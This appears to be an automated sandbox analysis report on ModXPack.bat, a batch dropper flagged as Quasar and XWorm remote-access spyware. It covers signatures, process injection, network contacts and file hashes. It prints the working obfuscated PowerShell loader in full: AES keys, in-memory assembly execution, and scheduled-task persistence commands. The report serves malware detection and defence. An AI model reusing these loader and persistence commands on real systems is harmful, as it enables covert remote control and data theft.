Malware Analysis Report

2024-10-23 21:29

Sample ID 240413-y169pshc96
Target ModXPack.bat
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d

Threat Level: Known bad

The file ModXPack.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Detect Xworm Payload

Quasar payload

Quasar RAT

Xworm

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-13 20:16

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-13 20:16

Reported

2024-04-13 20:17

Platform

win10v2004-20240412-en

Max time kernel

42s

Max time network

61s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3124 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3124 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2228 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2032 wrote to memory of 1468 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2032 wrote to memory of 1468 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1468 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4068 wrote to memory of 3792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4068 wrote to memory of 3792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3792 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3792 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 3456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 3456 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2380 wrote to memory of 2272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2380 wrote to memory of 2272 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 2272 wrote to memory of 4420 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2272 wrote to memory of 4420 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4420 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 3076 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_600_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_600.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_600.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_600.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_600.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_600.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_38_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_38.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_38.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_38.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_38.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_38.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 china-earth.gl.at.ply.gg udp
US 147.185.221.19:14568 china-earth.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 notes-creation.gl.at.ply.gg udp
US 147.185.221.19:27030 notes-creation.gl.at.ply.gg tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjuxgqbs.m2f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2228-9-0x00000221D1600000-0x00000221D1622000-memory.dmp

memory/2228-10-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/2228-11-0x00000221E9820000-0x00000221E9830000-memory.dmp

memory/2228-12-0x00000221E9820000-0x00000221E9830000-memory.dmp

memory/2228-13-0x00000221CF940000-0x00000221CF948000-memory.dmp

memory/2228-14-0x00000221EBC90000-0x00000221EBE32000-memory.dmp

memory/4084-16-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4084-27-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp

memory/4084-26-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp

memory/4084-28-0x000001B67C8E0000-0x000001B67C8F0000-memory.dmp

memory/4084-31-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d49a4af7a844bfc7247d5670def557
SHA1 26ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA256 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA512 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_600.vbs

MD5 8d99f4924ef95453687c157e804c9b60
SHA1 5c1033f40b2ff5b82bcd7f3b7327aca73f8c05fb
SHA256 9c06a5186719d628bd78ca5bf2adb5adf6687f45080be5a453b2466eb0eba7f5
SHA512 7e22fa19c08be6f6233d10b338416da20c9f39b8037799930b272b27346a7f58573e55b0bc5b70211c1de4d076128ea97af36e86b6d81f825b71957c9c655a50

C:\Users\Admin\AppData\Roaming\startup_str_600.bat

MD5 51d7b8be303abf43851e767d9250887b
SHA1 e795e381647c8a99529f87810347881b6b9bdeba
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
SHA512 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26

memory/4068-40-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4068-41-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/4068-42-0x00000204ACEB0000-0x00000204ACEC0000-memory.dmp

memory/2228-53-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/4068-56-0x00000204C74C0000-0x00000204C74CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ModPack.bat

MD5 105f33324f5807a250699b78a8972954
SHA1 c7e43ef81256e582a290a84a387a2163e35de9fb
SHA256 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5
SHA512 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101

memory/2380-65-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/2380-71-0x0000021E33DA0000-0x0000021E33DB0000-memory.dmp

memory/2380-70-0x0000021E33DA0000-0x0000021E33DB0000-memory.dmp

memory/2380-72-0x0000021E33D90000-0x0000021E33D98000-memory.dmp

memory/2380-73-0x0000021E4E0F0000-0x0000021E4E222000-memory.dmp

memory/3456-75-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/3456-86-0x000001806A150000-0x000001806A160000-memory.dmp

memory/3456-85-0x000001806A150000-0x000001806A160000-memory.dmp

memory/3456-87-0x000001806A150000-0x000001806A160000-memory.dmp

memory/3456-89-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 829eca69e3018062c625f2569858bebc
SHA1 d02dc553306bd3b29fa4fb1b789e3d07f251accf
SHA256 4a6b44ff19a84564fb03e21ed4b088df5a5b969843b47cb36853f33e9ebf8287
SHA512 6317f8090385e8cf95f070df12e663210be450dbcbf98f5c7b6bd411750b2876a33386c63497f62916a59804d6ab86bc2420c64cf5806cc1ade9613f44091009

C:\Users\Admin\AppData\Roaming\startup_str_38.vbs

MD5 37dd910af3853eec893618d5ac68fc09
SHA1 44663de84c4e2ea3502e07a4925b03d6f75262f1
SHA256 134fa00d82f1a1edbfd6027b8cb910ba6f71ad91302295fd14dac226e7a6eb4f
SHA512 ad1ae0cb28d4817e4da1704bb8d5ccf8503efea59117696b72552986aaf22dc99dbed995aa7423e36881faddaf066c7e3481e37d2d27deb4d5a3347d4fc03583

memory/3076-97-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

memory/2380-99-0x00007FFE2CA40000-0x00007FFE2D501000-memory.dmp

